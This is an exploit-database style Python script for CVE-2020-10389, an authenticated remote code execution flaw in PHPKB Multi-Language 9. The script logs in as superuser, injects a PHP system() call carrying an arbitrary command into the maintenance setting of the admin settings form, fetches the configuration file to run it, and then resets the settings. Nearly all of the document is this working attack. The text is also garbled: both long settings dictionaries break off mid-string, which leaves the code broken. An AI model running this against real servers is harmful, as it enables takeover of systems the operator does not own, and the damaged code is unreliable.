# Exploit Title: PHPKB Multi-Language 9 - Authenticated Remote
Code Execution
# Google Dork: N/A
# Date: 2020-03-15
# Exploit Author: Antonio Cannito
# Vendor Homepage: https://www.knowledgebase-script.com/
# Software Link:
https://www.knowledgebase-script.com/pricing.php
# Version: Multi-Language v9
# Tested on: Windows 8.1 / PHP 7.4.3
# CVE : CVE-2020-10389
#!/usr/bin/env python3
import argparse
import requests
#Parsing arguments
parser = argparse.ArgumentParser(description="Exploiting
CVE-2020-10389 - Authenticated Remote Code Execution in Chadha
PHPKB Standard Multi-Language 9 in admin/save-settings.php")
parser.add_argument("url", type=str, help="PHPKB's base path")
parser.add_argument("username", type=str, help="Superuser
username")
parser.add_argument("password", type=str, help="Superuser
password")
parser.add_argument("cmd", type=str, help="The command you want
executed")
args = parser.parse_args()
session = requests.Session()
#Perform login
session.post(args.url + "/admin/login.php", data={'phpkb_username':
args.username, 'phpkb_password': args.password, 'login':
'LOGIN'}).text
#Sending exploit code and downloading the file
exp = """' . system("{}") . '""".format(args.cmd)
data = {"putdown_for_maintenance": "no{}".format(exp), "kbname":
"test", "kburl": "http://localhost/phpkb", "kb_access":
"unrestricted", "extended_support_license_key": '', "mail_server":
"default", "smtp_hostname": '', "smtp_username": '',
"smtp_password": '', "smtp_port": '', "encryption_method": "None",
"emails_debug_mode": "0", "emails_debug_output": "error_log",
"send_mails_from": '', "test_email": '', "mysqlserver":
"127.0.0.1", "mysqlusername": "root", "mysqlpswd": "DummyPass",
"mysqldatabase": "test", "kb_layout": "fluid",
"category_tree_width": "3", "sidebar_orientation": "left",
"category_tree_layout": "normal", "show_tree_articles": "yes",
"category_articles_count": "show", "categories_display_order":
"Alphabetic", "home_theme": "modern", "home_search_layout":
"default", "categories_layout_theme": "carousel",
"show_categories_cols": "3", "category_title_size": "normal",
"home_articles_layout": "tabbed", "display_featured": "yes",
"featured_count": "5", "display_popular": "yes", "popular_count":
"5", "display_rated": "yes", "rated_count": "5", "display_recent":
"yes", "recent_count": "5", "enable_subscribe_kb": "yes",
"kb_subscribe_theme": "minimal", "category_articles_layout":
"default", "category_page_records_default": "10",
"category_page_records_minimal": "10", "articles_sortby":
"Popularity", "articles_sortorder": "Descending",
"enable_subscribe_category": "yes", "enable_news_page": "yes",
"display_homepage_news": "yes", "number_homepage_news": "5",
"enable_login_page": "yes", "enable_glossary_page": "yes",
"enable_contact_page": "yes", "send_contact_email": "yes",
"contact_email_address": "Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser.",
"enable_instant_suggestions": "yes", "minimum_question_characters":
"60", "default_search": "Articles", "search_in_articles": "All",
"search_in_others": "Both", "search_filter": "Any Word",
"display_recentviewed": "yes", "recentviewed_count": "5",
"display_popular_searches": "yes", "popularsearch_count": "5",
"article_page_theme": "default", "article_sidebar_content":
"related", "enable_add_favorite": "yes", "enable_print_article":
"yes", "enable_email_article": "yes", "enable_exportto_msword":
"yes", "enable_exportto_pdf": "yes", "enable_subscribe_article":
"yes", "enable_custom_fields": "yes", "enable_article_rating":
"yes", "enable_article_hits": "yes", "enable_article_author":
"yes", "show_author_email": "yes", "enable_related_articles":
"yes", "number_related_articles": "10",
"show_related_articles_randomly": "yes", "enable_article_feedback":
"yes", "enable_article_comments": "yes",
"existing_comments_visibility": "hide", "show_comments_to": "all",
"comments_sortorder": "Descending", "email_privacy_protection":
"yes", "article_meta_source": "article title",
"notify_pending_comment_superuser": "yes",
"notify_approved_comment_user": "yes", "schema_publisher_name": '',
"schema_publisher_logo": '', "enable_rss_feed": "yes",
"enable_rss_featured_feed": "yes", "enable_rss_popular_feed":
"yes", "enable_rss_latest_feed": "yes", "enable_rss_rated_feed":
"yes", "enable_rss_related_feed": "yes", "number_login_attempts":
"9223372036854775807", "login_delay": "5", "maxfilesize": "10240",
"kb_allowed_upload_file_types":
"gif,jpg,jpeg,png,wma,wmv,swf,doc,docx,zip,pdf,txt",
"searching_method": "0", "fulltext_mode": "0",
"searchresultsperpage": "10", "enable_search_files": "yes",
"doc_path": "C:\\antiword\\antiword.exe", "ppt_path":
"C:\\xampp\\htdocs\\phpkb\\admin\\ppthtml.exe", "xls_path":
"C:\\xampp\\htdocs\\phpkb\\admin\\xlhtml.exe", "pdf_path":
"C:\\xampp\\htdocs\\phpkb\\admin\\pdftotext.exe",
"index_attachment": "yes", "enable_autosave": "yes",
"autosave_interval": "120000", "use_wysiwyg_editor": "yes",
"enable_version_history": "yes", "enable_captcha": "yes",
"captcha_type": "default", "recaptcha_site_key": '',
"recaptcha_secret_key": '', "syntax_highlighter_theme":
"shThemeDefault", "pdf_library": "wkhtmltopdf", "wkhtmltopdf_path":
"lol", "pdf_header": '', "pdf_footer_type": "default",
"pdf_page_numbers": "yes", "pdf_page_number_position": "Left",
"pdf_footer": '', "kb_meta_keywords": "keyword1, keyword2, ke
url = args.url + "/admin/manage-settings.php"
session.post(url, data=data)
print(session.get(args.url +
"admin/include/configuration.php").text.encode('utf-8'))
#Resetting settings
data = {"putdown_for_maintenance": "no{}", "kbname": "test",
"kburl": "http://localhost/phpkb", "kb_access": "unrestricted",
"extended_support_license_key": '', "mail_server": "default",
"smtp_hostname": '', "smtp_username": '', "smtp_password": '',
"smtp_port": '', "encryption_method": "None", "emails_debug_mode":
"0", "emails_debug_output": "error_log", "send_mails_from": '',
"test_email": '', "mysqlserver": "127.0.0.1", "mysqlusername":
"root", "mysqlpswd": "DummyPass", "mysqldatabase": "test",
"kb_layout": "fluid", "category_tree_width": "3",
"sidebar_orientation": "left", "category_tree_layout": "normal",
"show_tree_articles": "yes", "category_articles_count": "show",
"categories_display_order": "Alphabetic", "home_theme": "modern",
"home_search_layout": "default", "categories_layout_theme":
"carousel", "show_categories_cols": "3", "category_title_size":
"normal", "home_articles_layout": "tabbed", "display_featured":
"yes", "featured_count": "5", "display_popular": "yes",
"popular_count": "5", "display_rated": "yes", "rated_count": "5",
"display_recent": "yes", "recent_count": "5",
"enable_subscribe_kb": "yes", "kb_subscribe_theme": "minimal",
"category_articles_layout": "default",
"category_page_records_default": "10",
"category_page_records_minimal": "10", "articles_sortby":
"Popularity", "articles_sortorder": "Descending",
"enable_subscribe_category": "yes", "enable_news_page": "yes",
"display_homepage_news": "yes", "number_homepage_news": "5",
"enable_login_page": "yes", "enable_glossary_page": "yes",
"enable_contact_page": "yes", "send_contact_email": "yes",
"contact_email_address": "Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser.",
"enable_instant_suggestions": "yes", "minimum_question_characters":
"60", "default_search": "Articles", "search_in_articles": "All",
"search_in_others": "Both", "search_filter": "Any Word",
"display_recentviewed": "yes", "recentviewed_count": "5",
"display_popular_searches": "yes", "popularsearch_count": "5",
"article_page_theme": "default", "article_sidebar_content":
"related", "enable_add_favorite": "yes", "enable_print_article":
"yes", "enable_email_article": "yes", "enable_exportto_msword":
"yes", "enable_exportto_pdf": "yes", "enable_subscribe_article":
"yes", "enable_custom_fields": "yes", "enable_article_rating":
"yes", "enable_article_hits": "yes", "enable_article_author":
"yes", "show_author_email": "yes", "enable_related_articles":
"yes", "number_related_articles": "10",
"show_related_articles_randomly": "yes", "enable_article_feedback":
"yes", "enable_article_comments": "yes",
"existing_comments_visibility": "hide", "show_comments_to": "all",
"comments_sortorder": "Descending", "email_privacy_protection":
"yes", "article_meta_source": "article title",
"notify_pending_comment_superuser": "yes",
"notify_approved_comment_user": "yes", "schema_publisher_name": '',
"schema_publisher_logo": '', "enable_rss_feed": "yes",
"enable_rss_featured_feed": "yes", "enable_rss_popular_feed":
"yes", "enable_rss_latest_feed": "yes", "enable_rss_rated_feed":
"yes", "enable_rss_related_feed": "yes", "number_login_attempts":
"9223372036854775807", "login_delay": "5", "maxfilesize": "10240",
"kb_allowed_upload_file_types":
"gif,jpg,jpeg,png,wma,wmv,swf,doc,docx,zip,pdf,txt",
"searching_method": "0", "fulltext_mode": "0",
"searchresultsperpage": "10", "enable_search_files": "yes",
"doc_path": "C:\\antiword\\antiword.exe", "ppt_path":
"C:\\xampp\\htdocs\\phpkb\\admin\\ppthtml.exe", "xls_path":
"C:\\xampp\\htdocs\\phpkb\\admin\\xlhtml.exe", "pdf_path":
"C:\\xampp\\htdocs\\phpkb\\admin\\pdftotext.exe",
"index_attachment": "yes", "enable_autosave": "yes",
"autosave_interval": "120000", "use_wysiwyg_editor": "yes",
"enable_version_history": "yes", "enable_captcha": "yes",
"captcha_type": "default", "recaptcha_site_key": '',
"recaptcha_secret_key": '', "syntax_highlighter_theme":
"shThemeDefault", "pdf_library": "wkhtmltopdf", "wkhtmltopdf_path":
"lol", "pdf_header": '', "pdf_footer_type": "default",
"pdf_page_numbers": "yes", "pdf_page_number_position": "Left",
"pdf_footer": '', "kb_meta_keywords": "keyword1, keyword2,
keyword3", "kb
session.post(url, data=data)
